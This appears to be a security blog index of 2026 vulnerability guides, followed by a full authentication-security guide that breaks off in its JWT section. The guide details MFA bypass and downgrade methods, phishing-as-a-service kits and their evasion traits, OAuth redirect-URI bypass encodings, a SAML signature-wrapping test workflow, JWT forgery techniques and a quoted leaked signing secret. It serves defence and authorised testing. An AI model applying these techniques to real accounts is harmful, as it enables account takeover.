XSS Prevention Guide 2026

Comprehensive XSS Guide 🆕 Enhanced May 2, 2026 - Updated with 636 insights including 2026 XSS techniques, context-aware payload exploitation, and framework-specific attack vectors from automated security research analysis. A practitioner’s reference for Cross-Site Scripting — attack surface, context-aware payloads, filter/WAF/CSP bypass techniques, framework-specific vulnerabilities, real-world chains, and detection/prevention. Compiled from 636 research sources with automated content analysis and deduplication. Table of Contents Fundamentals Attack Surface & Entry Points Context-Aware Payloads Filter Bypass Techniques WAF Bypasses CSP Bypass Techniques Mutation XSS (mXSS) DOM Clobbering & Prototype Pollution Framework-Specific XSS AngularJS Sandbox Escapes postMessage & DOM XSS SVG, PDF & File Upload XSS Blind XSS Weaponized XSS Payloads Polyglots Real-World Exploitation Chains Tools & Automation Detection & Prevention Payload Quick Reference CVE Reference 1. Fundamentals XSS occurs when attacker-controlled input is rendered in a victim’s browser as executable code (JavaScript, or markup that leads to JavaScript execution). The victim’s browser runs the injected code with the origin’s privileges — same-origin access to cookies, DOM, API tokens, and session state. ...

April 10, 2026 · 19 min · Carl Sampson

Web Security Hub 2026

Complete Web Vulnerability Prevention Hub Enhanced May 2026 with 2,000+ sources and real-time CVE intelligence - the only security guide collection with automated 2026 threat integration. 🎯 Core Web Vulnerabilities Injection Attacks XSS Prevention Guide - 636 sources (+116% expansion) 2026 bypass techniques, modern framework exploits, real-time CVE intelligence SQL Injection Guide - 113 sources (+223% expansion) ORM/NoSQL variants, database-specific exploits, enterprise platform CVEs Command Injection & RCE Guide - 628 sources ...

4 min · Carl Sampson

SSRF Prevention Guide 2026

Comprehensive SSRF Guide 🆕 Enhanced May 2, 2026 - Updated with AI/MCP risks, CVE-2026-33626 analysis, and modern SSRF exploitation techniques from 686 automated security research sources. A practitioner’s reference for Server-Side Request Forgery — attack surface, exploitation techniques, bypass methods, real-world chains, and detection/prevention. Compiled from 686 research sources with automated content analysis and deduplication. Table of Contents Fundamentals Attack Surface & Entry Points IP Address Bypass Techniques URL Parsing & Protocol Tricks Cloud Metadata Exploitation Blind SSRF Techniques Protocol Smuggling Framework-Specific SSRF PDF Generator SSRF Real-World Exploitation Chains Tools & Automation MCP / AI Agent SSRF IPv6 & DNS Rebinding Bypass Patterns Detection & Prevention Payload Quick Reference 1. Fundamentals SSRF occurs when an attacker can make a server-side application send HTTP requests to an attacker-chosen destination. The server acts as a proxy, often with elevated network access (internal services, cloud metadata, localhost) and implicit trust (firewall bypass, authentication context). ...

April 10, 2026 · 28 min · Carl Sampson

Comprehensive SQL Injection Guide

Comprehensive SQL Injection Guide 🆕 Enhanced May 2, 2026 - Updated with 113 sources and 2026 SQLi techniques including ORM/NoSQL variants, database-specific exploit chains, and enterprise platform CVEs. A practitioner’s reference for SQL Injection — attack classes, exploitation techniques, database-specific payloads, WAF bypass methods, ORM/NoSQL variants, real-world CVEs, and detection/prevention. Compiled from 113 research sources including latest 2026 enterprise platform vulnerabilities. Table of Contents Fundamentals Attack Classes Entry Points & Injection Contexts DBMS Fingerprinting Authentication Bypass Union-Based Injection Error-Based Injection Boolean Blind Injection Time-Based Blind Injection Out-of-Band (OOB) Injection Second-Order SQL Injection Stacked Queries & Polyglots WAF Bypass Techniques Database-Specific Payloads ORM Injection NoSQL Injection SQLi to RCE Header, Cookie & JSON-Body Injection Constraint-Based Attacks Real-World CVEs Tools & Automation Detection & Prevention Payload Quick Reference 1. Fundamentals SQL Injection (SQLi) occurs when an attacker can influence the SQL statements that an application sends to its database. The vulnerability arises from the unsafe concatenation of untrusted input into a query string, allowing the attacker to break out of the intended data context and execute attacker-controlled SQL. SQLi has sat in the OWASP Top Ten since its inception and remains one of the highest-impact classes of web vulnerability despite decades of awareness. ...

April 10, 2026 · 22 min · Carl Sampson

Comprehensive CSRF Guide

Comprehensive CSRF Guide 🆕 Enhanced May 2, 2026 - Updated with 107 sources and bypass techniques including SameSite cookie exploitation, token validation bypasses, and enterprise platform vulnerabilities. A practitioner’s reference for Cross-Site Request Forgery — attack surface, exploitation techniques, SameSite and token bypasses, real-world chains, and detection/prevention. Compiled from 107 research sources including latest enterprise and financial platform vulnerabilities. Table of Contents Fundamentals Attack Surface & Preconditions Attack Delivery Techniques Content-Type & JSON CSRF SameSite Cookie Model SameSite Bypass Techniques CSRF Token Bypasses Referer / Origin Check Bypasses Method Override & Verb Tampering Login & Logout CSRF CORS Misconfiguration Chains Clickjacking Overlap Real-World Cases & CVEs Exploitation Chains Tools & Automation Detection & Testing Methodology Prevention & Defense in Depth Payload Quick Reference 1. Fundamentals Cross-Site Request Forgery (CSRF / XSRF / “sea-surf”) is an attack that tricks an authenticated user’s browser into submitting a state-changing request to a target application. The victim’s browser automatically attaches ambient credentials — cookies, HTTP Basic auth, client certificates, Kerberos tickets, IP-based authorization — so the target application cannot distinguish a forged request from a legitimate one. ...

April 10, 2026 · 27 min · Carl Sampson

Comprehensive IDOR Guide

Comprehensive IDOR Guide 🆕 Enhanced May 2, 2026 - Updated with 185 sources (+741% expansion) including modern IDOR enumeration patterns, authorization bypass techniques, and 2026 critical CVEs. A practitioner’s reference for Insecure Direct Object Reference (IDOR) and Broken Object Level Authorization (BOLA) — attack surface, enumeration patterns, bypass techniques, real-world writeups, detection workflow, and prevention. Compiled from 22 research sources. Table of Contents Fundamentals IDOR vs BOLA vs BFLA Attack Surface & Where Identifiers Live Horizontal vs Vertical Access Identifier Enumeration Patterns Parameter Tampering Techniques HTTP Method & Verb Tampering Content-Type & Format Bypasses Path, Version, and Endpoint Tricks Mass Assignment Overlap UUID & Unpredictable ID Defeats Second-Order and Blind IDOR GraphQL, WebSocket, and Non-REST Surfaces Real-World Writeups & CVEs Exploit Chains Detection Methodology with Autorize Tools & Automation Impact & Severity Mapping Prevention & Secure Design Testing Checklist Report Writing 1. Fundamentals IDOR occurs when an application uses user-supplied input to reference an internal object (database row, file, resource) and fails to verify whether the current user is authorized to access that specific object. The application trusts the identifier, not the identity. ...

April 10, 2026 · 27 min · Carl Sampson

Comprehensive RCE Guide

Comprehensive RCE Guide 🆕 Enhanced May 2, 2026 - Updated with command injection CVEs, Expression Language (EL) techniques, and modern RCE exploitation methods from 628 automated security research sources. A practitioner’s reference for Remote Code Execution — vulnerability classes, exploitation primitives, language-specific chains, real-world CVEs, and detection/prevention. Compiled from 507 research sources including latest 2026 critical vulnerabilities. 🔥 Latest Update: May 2, 2026 - Enhanced with 2026 critical CVEs including CVE-2025-53652 (Jenkins), CVE-2026-32191 (Microsoft Bing), CVE-2026-34197 (ActiveMQ), and modern command injection + expression language techniques. ...

April 10, 2026 · 34 min · Carl Sampson

Comprehensive XXE Guide

Comprehensive XXE Guide 🆕 Enhanced May 2, 2026 - Updated with 93 sources and XML security CVEs including out-of-band exfiltration techniques, parser exploitation, and enterprise platform vulnerabilities. A practitioner’s reference for XML External Entity injection — fundamentals, parser quirks, in-band and out-of-band exfiltration, parameter entity chains, file-format vectors, real-world CVEs, tooling, and hardening. Compiled from 93 research sources including latest enterprise platform vulnerabilities. Table of Contents Fundamentals Attack Surface & Entry Points Classic In-Band XXE Blind XXE via External DTD Error-Based XXE Parameter Entities & Local DTD Chains XXE → SSRF Pivoting XXE → File Read & Information Disclosure XXE → RCE Parser-Specific Behaviors XML File-Format Vectors WAF & Filter Bypasses Denial of Service Real-World CVEs & Chains Tooling Detection & Prevention Payload Quick Reference 1. Fundamentals XXE (XML External Entity) injection occurs when an XML parser processes attacker-controlled input with DTD (Document Type Definition) and external entity resolution enabled. The parser treats SYSTEM identifiers as URIs, fetching and substituting their content into the document — yielding file read, SSRF, blind exfiltration, DoS, and in some stacks RCE. ...

April 10, 2026 · 24 min · Carl Sampson

Comprehensive Insecure Deserialization Guide

Comprehensive Insecure Deserialization Guide 🆕 Enhanced May 2, 2026 - Updated with 126 sources and serialization CVEs including gadget chain mechanics, language-specific exploits, and AI/ML platform vulnerabilities. A practitioner’s reference for insecure deserialization — language-specific attack surface, gadget chain mechanics, real-world CVE chains, tools, and detection/prevention. Compiled from 126 research sources including latest AI/ML platform vulnerabilities. Table of Contents Fundamentals Attack Surface & Entry Points Java Deserialization PHP Object Injection Python Pickle & ML Pipelines .NET Deserialization Ruby Marshal & YAML Node.js Deserialization YAML & JSON Format Attacks Gadget Chains Explained Real-World CVEs & Exploitation Chains Tools & Automation Detection & Static Analysis Prevention & Mitigation Signature & Gadget Quick Reference 1. Fundamentals Insecure deserialization occurs when an application reconstructs program objects from attacker-controlled data without sufficient validation. Serialization converts an in-memory object graph to a byte stream for storage or transit; deserialization reverses the process. The danger is that most native serialization formats are not just data — they are instructions for how to rebuild arbitrary objects, including which classes to instantiate and which methods (constructors, magic methods, callbacks) to run along the way. ...

April 10, 2026 · 36 min · Carl Sampson

Comprehensive GraphQL Security Guide

Comprehensive GraphQL Security Guide 🆕 Enhanced May 2, 2026 - Updated with 78 sources and GraphQL CVEs including introspection attacks, authorization bypasses, and engine-specific exploitation techniques. A practitioner’s reference for attacking and defending GraphQL APIs — discovery, introspection, schema recovery, injection, authorization flaws, batching, DoS, subscriptions, CSRF/CSWSH, engine-specific quirks, and detection/prevention. Compiled from 31 research sources. Table of Contents Fundamentals Discovery & Fingerprinting Introspection Schema Recovery Without Introspection Query & Data Extraction Mutations & Mass Assignment Authorization Flaws (BOLA / BFLA / IDOR) Injection Through GraphQL Batching Attacks & Aliases Denial of Service CSRF & CSWSH Subscriptions & WebSockets Engine-Specific Notes (Apollo, Hasura, graphql-java, async-graphql, Mercurius) Notable CVEs & Real-World Chains Tooling Detection & Prevention Payload Quick Reference 1. Fundamentals GraphQL is a query language and server runtime for APIs, originally developed at Facebook and open-sourced in 2015. Instead of the multiple fixed endpoints of a REST API, a GraphQL service exposes a single endpoint that accepts typed queries and returns exactly the fields the client asks for. ...

April 10, 2026 · 23 min · Carl Sampson

API Security Guide 2026

Comprehensive API Security Guide 🆕 Enhanced May 2, 2026 - Updated with 490 sources (+900% expansion) including AI/LLM API vulnerabilities, modern authentication bypass techniques, and 2026 OWASP API security research. A practitioner’s reference for API security — attack surface, OWASP API Top 10 exploitation, authentication and authorization bypasses, GraphQL-specific attacks, rate limit evasion, API gateway hardening, open banking compliance, AI/MCP risks, real-world chains, and detection/prevention. Compiled from 490 research sources including latest 2026 AI/LLM vulnerabilities. ...

April 10, 2026 · 32 min · Carl Sampson

Comprehensive Authorization & Access Control Guide

Comprehensive Authorization & Access Control Guide 🆕 Enhanced May 2, 2026 - Updated with privilege escalation CVEs including broken access control patterns, authorization bypass techniques, and OWASP A01 security analysis. A practitioner’s reference for Broken Access Control (OWASP A01) — the models, bug classes, bypass techniques, real-world chains, and detection/prevention patterns that matter in modern web and API testing. Enhanced from 107 research sources with 2026 privilege escalation CVEs. 🔥 Latest Update: May 2, 2026 - Enhanced with 2026 privilege escalation CVEs including CVE-2025-26244 (DeimosC2), CVE-2026-25253+ (OpenClaw chain), CVE-2025-53767 (Azure OpenAI) from automated security intelligence. ...

April 10, 2026 · 38 min · Carl Sampson

Comprehensive Python Security Guide

Comprehensive Python Security Guide 🆕 Enhanced May 2, 2026 - Updated with 8 critical CVEs including AI/ML framework vulnerabilities (Ollama, Hugging Face), supply chain security patterns, and Python 3.15 security features from automated 2026 threat intelligence analysis. A practitioner’s defensive reference for securing Python applications — dangerous APIs, deserialization pitfalls, framework-specific risks, supply chain attacks, AI/ML security threats, 2026 CVEs, advanced static analysis, and hardening patterns. Enhanced with cutting-edge threat intelligence and defensive techniques. ...

May 2, 2026 · 37 min · Carl Sampson

Comprehensive Authentication Guide

Comprehensive Authentication Guide 🆕 Enhanced May 2, 2026 - Updated with 2026 authentication CVEs including MFA bypass techniques, SSO vulnerabilities, and modern authentication protocol exploits. A practitioner’s reference for authentication security — protocols, mechanisms, vulnerabilities, exploitation techniques, and defense strategies. Covers traditional and modern authentication methods from enterprise to web applications. Compiled from 55 research sources.

Table of Contents

- Fundamentals
- Password-Based Authentication
- Multi-Factor Authentication (MFA)
- OAuth 2.0 & OpenID Connect
- SAML & Enterprise SSO
- Modern Authentication (FIDO, WebAuthn, Passkeys)
- JWT Security
- Session Management
- Authentication Bypasses & Attacks
- Implementation Security
- Testing & Verification

1. Fundamentals

Core Concepts

| Term | Definition | Security Impact |
|---|---|---|
| Authentication (AuthN) | Process of verifying identity claims | Foundation of access control |
| Digital Identity | Unique representation in online context | Basis for authorization decisions |
| Identity Proofing | Binding digital identity to real person | KYC/compliance requirement |
| Session Management | Maintaining state across requests | Critical for web application security |
| Non-Human Identity (NHI) | API keys, OAuth tokens, service accounts | Path of least resistance for attackers — not bound by MFA or IP restrictions |

Authentication Factors

| Factor Type | Examples | Vulnerability Classes |
|---|---|---|
| Something You Know | Passwords, PINs, security questions | Brute force, credential stuffing, social engineering |
| Something You Have | Hardware tokens, mobile apps, SMS | SIM swapping, device theft, malware |
| Something You Are | Biometrics (fingerprint, face, voice) | Spoofing, template theft, privacy concerns |

2. Password-Based Authentication

Password Strength Requirements

| Requirement | NIST SP800-63B Standard | Security Rationale |
|---|---|---|
| Minimum Length | 8 chars (with MFA), 14+ (without MFA) | Increases brute force difficulty |
| Maximum Length | At least 64 characters | Prevents artificial length limits |
| Character Composition | No mandatory complexity rules | Avoid predictable patterns |
| Dictionary Checking | Block common passwords | Prevent credential stuffing |

Common Password Vulnerabilities

    ATTACK VECTORS:
    ├── Credential Stuffing
    │   ├── Breach databases (HaveIBeenPwned)
    │   ├── Password reuse across sites
    │   └── Automated login attempts
    ├── Brute Force Attacks
    │   ├── Dictionary attacks
    │   ├── Rule-based mutations
    │   └── Hybrid attacks
    └── Password Reset Flows
        ├── Weak reset tokens
        ├── Token reuse vulnerabilities
        ├── Account enumeration
        └── Email interception for ATO (Post SMTP CVE-2025-24000 — Subscriber+ reads reset emails via broken REST API permissions)

Secure Implementation Patterns

| Security Control | Implementation | Bypass Techniques |
|---|---|---|
| Rate Limiting | Progressive delays, account lockouts | IP rotation, distributed attacks |
| CAPTCHA | Human verification challenges | OCR bypass, solving services |
| Password Hashing | bcrypt, scrypt, Argon2 | Rainbow tables (if salts weak) |
| Breach Detection | Monitor for credential exposure | Private/corporate breaches |
| REST API Auth | Role-based permission callbacks (not just is_user_logged_in()) | Subscriber-level access to admin endpoints |

3. Multi-Factor Authentication (MFA)

MFA Implementation Types

| Method | Security Level | User Experience | Attack Vectors |
|---|---|---|---|
| SMS OTP | Low | High friction | SIM swapping, SS7 attacks |
| TOTP Apps | Medium | Medium friction | Device compromise, social engineering |
| Push Notifications | Medium-High | Low friction | MFA fatigue, device takeover |
| Hardware Tokens | High | Medium friction | Physical theft, supply chain |
| Biometrics | High | Low friction | Spoofing, template extraction |
| Passwordless (FastPass/FIDO2) | Very High | Low friction | Device compromise (Okta Terrify), endpoint proxy |

MFA Bypass Techniques

    BYPASS METHODS:
    ├── Social Engineering
    │   ├── MFA fatigue (push spam)
    │   ├── Vishing (voice phishing)
    │   └── SIM swapping
    ├── Technical Bypasses
    │   ├── Session fixation
    │   ├── MFA enrollment abuse
    │   ├── Backup code exploitation
    │   └── Race conditions
    ├── Adversary-in-the-Middle (AiTM)
    │   ├── Real-time phishing (Evilginx, Tycoon 2FA, Evilproxy, Mamba 2FA)
    │   ├── Session cookie interception and replay
    │   ├── Token replay
    │   └── Cloudflare Workers as transparent proxy (IOActive research)
    ├── Authentication Downgrade Attacks
    │   ├── JSON config manipulation — flip FIDO2 isDefault:false, push isDefault:true
    │   ├── CSS injection to hide passkey/FIDO2 UI options
    │   ├── Browser User-Agent spoofing (e.g., Safari on Windows) to trigger Entra ID fallback
    │   └── WebAuthn immediate mediation abuse for non-WebAuthn fallback steering
    ├── Conditional Access Policy (CAP) Bypasses
    │   ├── IP whitelisting bypass (VPN, Zscaler pivoting)
    │   ├── Geo-whitelisting bypass (VPN/location spoofing)
    │   ├── User-agent whitelisting bypass (custom UA strings)
    │   ├── Cloud tooling bypasses (ROADtools, BloodHound, AADInternals)
    │   └── Non-MFA hosts (legacy protocols, password reset portals)
    └── Machine-Based Attacks
        ├── Session token theft from memory (Cobalt Strike BOFs)
        ├── OTP keylogging / seed QR code theft
        ├── Okta Terrify — extract passwordless keys from compromised endpoint
        └── Stolen/unlocked devices

Phishing-as-a-Service (PhaaS) Kits

| Kit | Technique | Detection Evasion |
|---|---|---|
| Evilginx | Open-source reverse proxy AiTM | Default LetsEncrypt certs, 8-char URL paths, TLS fingerprint differs from target |
| Tycoon 2FA | PhaaS MFA bypass | Dynamically obfuscated JS, phishing URL gating, IP/UA filtering |
| Evilproxy | PhaaS MFA bypass | Templates for popular targets, bot detection |
| Mamba 2FA | PhaaS MFA bypass | Anti-crawler delays, redirect to benign pages |
| Cloudflare Workers | Serverless transparent proxy (IOActive PoC) | Zero forensic footprint, trusted CDN IPs, ephemeral execution |

Implementation Security Checklist

| Control | Verification | Common Mistakes |
|---|---|---|
| Enrollment Security | Verify primary auth before MFA setup | Allow MFA changes without re-auth |
| Backup Mechanisms | Secure recovery codes | Weak backup code generation |
| Device Trust | Risk-based authentication | Unlimited device trust |
| Rate Limiting | Throttle MFA attempts | No limits on failed attempts |
| Eliminate Fallbacks | No SMS/TOTP/push if FIDO2 deployed | Mixed-mode policies allow downgrade |
| Audit MFA Logs | Detect new MFA device registration post-compromise | Missing persistence detection |

4. OAuth 2.0 & OpenID Connect

OAuth 2.0 Flow Types

| Grant Type | Use Case | Security Considerations |
|---|---|---|
| Authorization Code | Server-side web apps | Most secure, requires PKCE for SPAs |
| Authorization Code + PKCE | Public clients, SPAs | Prevents authorization code injection |
| Implicit | Legacy SPAs | Deprecated, token in URL fragment |
| Client Credentials | Service-to-service | No user context, secure storage critical |
| Device Code | IoT/limited input devices | Phishing risk during user approval |

Common OAuth Vulnerabilities

| Vulnerability | Attack Vector | Mitigation |
|---|---|---|
| Authorization Code Interception | Redirect URI manipulation | Strict redirect validation |
| State Parameter Missing | CSRF attacks | Cryptographically strong state |
| Scope Escalation | Privilege elevation | Minimal scope principle |
| Client Impersonation | Stolen client credentials | Client authentication |
| OAuth Parameter Injection | Inject arbitrary params (redirect_uri, scope) into auth flow | Input sanitization (Okta auth0/nextjs-auth0 vuln) |
| Implicit Flow Token Theft | Access token in URL fragment, referer leakage | Migrate to Authorization Code + PKCE |
| CSRF via Missing State | Attacker injects own authorization code into victim session | State parameter enforcement |
| Redirect URI Bypass | Pattern-matching bypass (%2f%2f, %5c%5c, %3F, %23, port injection) | Exact string match, no wildcards |
| Credential Leakage via Referer | Authorization code or token in Referer header to third-party content | No third-party resources on callback pages |
| Non-Human Identity Abuse | Compromised OAuth tokens with overly broad scopes, null expiry refresh tokens | Scope minimization, token rotation, vendor vetting |

Dynamic Client Registration SSRF (PortSwigger Research)

    SSRF ATTACK SURFACE VIA DYNAMIC REGISTRATION:
    ├── logo_uri — Server fetches logo image → SSRF on /authorize
    ├── jwks_uri — Server fetches JWK set for client_assertion validation → Blind SSRF
    ├── sector_identifier_uri — Server fetches redirect_uri list → SSRF on registration or authorization
    ├── request_uris — Whitelisted request_uri values → SSRF on /authorize via request_uri param
    │   (Even without dynamic registration, test request_uri on /authorize directly)
    └── Discovery: GET /.well-known/openid-configuration
        ├── registration_endpoint
        ├── request_uri_parameter_supported
        └── require_request_uri_registration

    CVE-2021-26715: SSRF via logo_uri in MITREid Connect
    ForgeRock OpenAM: SSRF via request_uri + redirect_uri Session Poisoning

OAuth Security Implementation

    SECURITY CONTROLS:
    ├── Authorization Server
    │   ├── Strict redirect URI validation (exact match, no wildcards)
    │   ├── State parameter enforcement
    │   ├── PKCE for public clients
    │   ├── Short-lived authorization codes (single use)
    │   └── Disable Dynamic Client Registration if not needed
    ├── Resource Server
    │   ├── Token introspection
    │   ├── Scope validation
    │   ├── Audience verification
    │   └── Rate limiting
    ├── Client Application
    │   ├── Secure token storage (never in browser history/URL)
    │   ├── Token refresh handling with expiry
    │   ├── CSRF protection via state parameter
    │   ├── PKCE code_verifier/code_challenge
    │   └── TLS everywhere
    └── Non-Human Identity Governance
        ├── Monitor OAuth app registrations and consent grants
        ├── Audit token scopes vs actual usage
        ├── Enforce refresh token expiry (no null expiry)
        └── Vendor breach monitoring for third-party OAuth apps

OAuth Pentesting Checklist (Authorization Code Grant)

| Test Case | What to Check | Impact |
|---|---|---|
| Redirect URI Validation | Change redirect_uri to attacker domain, test pattern bypasses | Token/code theft |
| State Parameter | Remove or reuse state, test CSRF | Account hijacking |
| Code Reuse | Replay authorization code | Session hijacking |
| Client Secret Exposure | Check JS source, mobile app binaries | Full OAuth flow compromise |
| Scope Manipulation | Request elevated scopes | Privilege escalation |
| Token in URL/History | Check if access_token appears in URL fragment or browser history | Token theft |
| Referer Leakage | Check callback pages for third-party resource loads | Code/token leakage |
| request_uri SSRF | Supply attacker URL in request_uri param on /authorize | Server-side request forgery |

5. SAML & Enterprise SSO

SAML Attack Surface

| Component | Attack Vectors | Security Controls |
|---|---|---|
| Identity Provider (IdP) | XML signature bypass, SAML injection | Strong XML validation, signature verification |
| Service Provider (SP) | Assertion replay, audience restriction bypass, parser differential exploitation | Strict temporal/audience checks, single XML parser |
| SAML Assertions | XXE, signature wrapping (XSW), attribute pollution | Secure XML parsing, validation |
| Metadata | Metadata spoofing, certificate substitution | Out-of-band verification |
| FortiCloud SSO | Crafted SAMLResponse to /remote/saml/login (CVE-2025-59718) | Disable FortiCloud SSO until patched |

XML Signature Wrapping (XSW) Attacks — Deep Dive

    XSW ATTACK TAXONOMY:
    ├── Classic XSW
    │   ├── Move signed element, inject forged element in original location
    │   ├── Application processes forged data, signature validates against hidden original
    │   └── 8+ documented XSW variants in USENIX "On Breaking SAML" research
    ├── Parser Differential Exploits
    │   ├── ruby-saml: REXML + Nokogiri dual parser → different XPath results
    │   │   ├── CVE-2025-25291 / CVE-2025-25292 (ruby-saml < 1.18.0)
    │   │   ├── CVE-2024-45409 (ruby-saml signature bypass by ahacker1)
    │   │   └── Exploited in GitLab — sign in as any user with single valid signature
    │   ├── Attribute pollution — parser-specific attribute handling differences
    │   ├── REXML namespace confusion — without DTDs
    │   └── Void Canonicalization — novel technique (PortSwigger "The Fragile Lock")
    ├── Signature Exclusion / Comment Injection
    │   ├── Removing Signature element entirely
    │   ├── XML comment injection between signature elements
    │   └── Bypassing signature validation in libraries that don't enforce presence
    ├── Encrypted Assertion Bypass
    │   ├── GitHub Enterprise: signature extracted pre-decryption, inner assertion signature never validated
    │   │   ├── CVE-2024-4985 / CVE-2024-9487
    │   │   └── Forge assertion inside encrypted envelope, only outer response signature checked
    │   └── samlify (Node.js): CVE-2025-47949 — Signature Wrapping with unsigned assertion extraction
    └── Improper Cryptographic Signature Verification
        ├── FortiGate FortiCloud SSO: CVE-2025-59718 / CVE-2025-59719 (CVSS 9.8)
        │   ├── SAML response signature not validated → forged SAMLResponse grants super_admin
        │   ├── Endpoint: POST /remote/saml/login
        │   ├── Actively exploited in the wild (Arctic Wolf, CISA KEV)
        │   └── Affects FortiOS, FortiProxy, FortiSwitchManager, FortiWeb
        └── CWE-347 pattern: system checks temporal claims but skips signature verification

Real-World SAML CVEs

| CVE | Product | Vulnerability | Impact |
|---|---|---|---|
| CVE-2025-59718 | FortiGate FortiCloud SSO | Missing SAML signature validation | Unauthenticated admin access |
| CVE-2025-59719 | FortiGate FortiCloud SSO | Related bypass variant | Unauthenticated admin access |
| CVE-2025-25291 | ruby-saml | Parser differential (REXML/Nokogiri) | Sign in as any user |
| CVE-2025-25292 | ruby-saml | Parser differential (REXML/Nokogiri) | Sign in as any user |
| CVE-2024-45409 | ruby-saml | Signature bypass | Authentication bypass |
| CVE-2024-4985 | GitHub Enterprise | Encrypted assertion signature skip | SAML SSO bypass |
| CVE-2024-9487 | GitHub Enterprise | Follow-up encrypted assertion fix | SAML SSO bypass |
| CVE-2025-47949 | samlify (Node.js) | Signature Wrapping — unsigned assertion consumed | Authentication bypass, user impersonation |

SAML Bug Hunting Methodology

    SAML TESTING WORKFLOW (using SAML Raider):
    ├── Setup
    │   ├── Install SAML Raider Burp extension
    │   ├── Import/clone X.509 certificates
    │   └── Capture SAML Response in proxy
    ├── Signature Wrapping Tests
    │   ├── Apply all 8 XSW variants from SAML Raider
    │   ├── Test with both signed Response and signed Assertion
    │   └── Test with cloned/self-signed certificates
    ├── Signature Removal
    │   ├── Remove Signature element entirely
    │   ├── Remove SignatureValue content
    │   └── Test if SP accepts unsigned assertions
    ├── Assertion Manipulation
    │   ├── Modify NameID to target user
    │   ├── Modify role/group attributes
    │   ├── Change audience restriction
    │   └── Alter temporal conditions (NotBefore/NotOnOrAfter)
    ├── XML-Level Attacks
    │   ├── XXE injection in SAML Response
    │   ├── XML comment injection in NameID
    │   ├── DTD-based attacks (if not blocked)
    │   └── Namespace confusion / attribute pollution
    └── Certificate Tests
        ├── Clone IdP certificate, self-sign assertion
        ├── Test if SP validates certificate chain
        └── Test if SP accepts any valid signature (not just from trusted IdP)

6. Modern Authentication (FIDO, WebAuthn, Passkeys)

FIDO2/WebAuthn Architecture

| Component | Function | Security Properties |
|---|---|---|
| Authenticator | Private key storage, user verification | Hardware-backed, phishing-resistant |
| Client (Browser) | Protocol handling, user interaction | Sandboxed execution, origin binding |
| Relying Party | Credential management, verification | Challenge-response validation |
| FIDO Server | Registration/authentication logic | Cryptographic verification |

Passkey Types and Security Properties

| Type | Storage | Security Level | Enterprise Suitability |
|---|---|---|---|
| Device-Bound (Hardware Key) | YubiKey, security key hardware | Highest — non-exportable, hardware-backed | Recommended for enterprise |
| Synced (Multi-Device) | iCloud Keychain, Google Password Manager | Medium — inherits cloud account risk | Consumer use only; not recommended for enterprise |

Synced Passkey Risks

    SYNCED PASSKEY ATTACK SURFACE:
    ├── Cloud Account Compromise
    │   ├── iCloud/Google account takeover → all synced passkeys compromised
    │   ├── Recovery workflow abuse → authorize new device with stolen credentials
    │   └── Personal cloud account on corporate device → passkeys leak to personal devices
    ├── Authentication Downgrade
    │   ├── AiTM proxy spoofs unsupported browser → Entra ID disables passkey option
    │   ├── User steered to SMS/OTP/push → captured by proxy
    │   └── WebAuthn immediate mediation abused to offer weak fallback
    ├── Browser Extension Attacks
    │   ├── webAuthenticationProxy API — intercept navigator.credentials.create()/get()
    │   ├── Content script DOM injection — manipulate passkey UI elements
    │   ├── DOM-based extension clickjacking — trigger autofill and exfiltration
    │   └── Malicious extension forces password fallback or re-registration
    └── Help Desk Social Engineering
        └── Recovery process = real control point attackers target

WebAuthn Security Benefits

| Protection | Traditional Auth | WebAuthn |
|---|---|---|
| Phishing Resistance | Credentials reusable | Origin binding prevents cross-site use |
| Credential Theft | Server breaches expose passwords | Public key only stored server-side |
| Replay Attacks | Static credentials | Cryptographic challenges with freshness |
| Man-in-the-Middle | Credentials interceptable | Origin verification blocks proxy attacks |

Enterprise Passkey Deployment Guidance

| Area | Recommendation | Rationale |
|---|---|---|
| Credential Type | Device-bound only (hardware security keys) | Non-exportable, hardware-backed, inventoriable |
| Fallback Methods | Eliminate all (SMS, TOTP, push, email) | Weakest method = real security level |
| Browser Extensions | Allowlist only; block webAuthenticationProxy permission | Prevent WebAuthn API interception |
| Attestation | Capture device model and assurance at registration | Reject unrecognized authenticators |
| Recovery | Hardware key-based reproofing only | No help desk/email-based recovery |
| Session Binding | Tie sessions to device context, not just initial auth | Prevent portable session cookie theft |

Cloudflare FIDO2 Deployment Case Study

    CLOUDFLARE ROLLOUT TIMELINE:
    ├── 2018: Distributed YubiKey 5 Nano + YubiKey 5 NFC to all employees
    ├── 2020: Selective enforcement via Cloudflare Access (Zero Trust proxy)
    │   ├── OAuth2 integration with IdP, enforce "swk" (security key) AMR value
    │   └── Incremental rollout — one service at a time
    ├── Feb 2021: Full enforcement — disabled all TOTP/SMS
    │   ├── Triggered by social engineering phone calls to employees
    │   └── Offline recovery process for lost keys (distribute 2 keys per employee)
    ├── SSH via Cloudflare Tunnel: cloudflared + Access policies enforce FIDO2 for SSH
    └── Result: Zero successful phishing attacks post-deployment

7. JWT Security

JWT Attack Vectors

| Vulnerability | Technique | Real-World Example |
|---|---|---|
| Algorithm Confusion (alg=none) | Set JWT header alg to “none”, remove signature | Classic JWT bypass |
| Missing Signature Verification | Server decodes JWT but never checks signature | Convoy KVM CVE-2026-33746 (CVSS 9.8) — JWTService::decode() missing SignedWith constraint |
| JWE Encryption Mix-Up | Encrypt unsigned PlainJWT with server’s RSA public key; server decrypts and accepts without signature check | pac4j-jwt CVE-2026-29000 — forge admin tokens with public key only |
| Hardcoded JWT Secrets | Static/weak signing secrets | Zendesk Android SDK — hardcoded secret “987sdasdlkjlakdjf” + sequential IDs → mass ATO |
| Weak Cookie Auth Tags | Brute-forceable authentication tags on session cookies | Auth0-PHP SDK CVE-2025-47275 (CVSS 9.1) — brute force CookieStore auth tags |
| Default Signing Keys | Predictable or default JWT signing keys | Apache StreamPipes CVE-2025-47411 |

JWT Security Checklist

| Control | Implementation | Common Mistakes |
|---|---|---|
| Algorithm Enforcement | Whitelist allowed algorithms server-side | Accept alg from JWT header without validation |
| Signature Verification | Always verify before trusting claims | Check only expiration (Convoy pattern) |
| Key Management | Rotate secrets, use asymmetric keys | Hardcoded secrets, public key in source |
| Claim Validation | Verify iss, aud, exp, nbf, iat | Trust user-controlled claims |
| JWE Handling | Enforce inner JWT must be signed, not PlainJWT | Accept PlainJWT inside
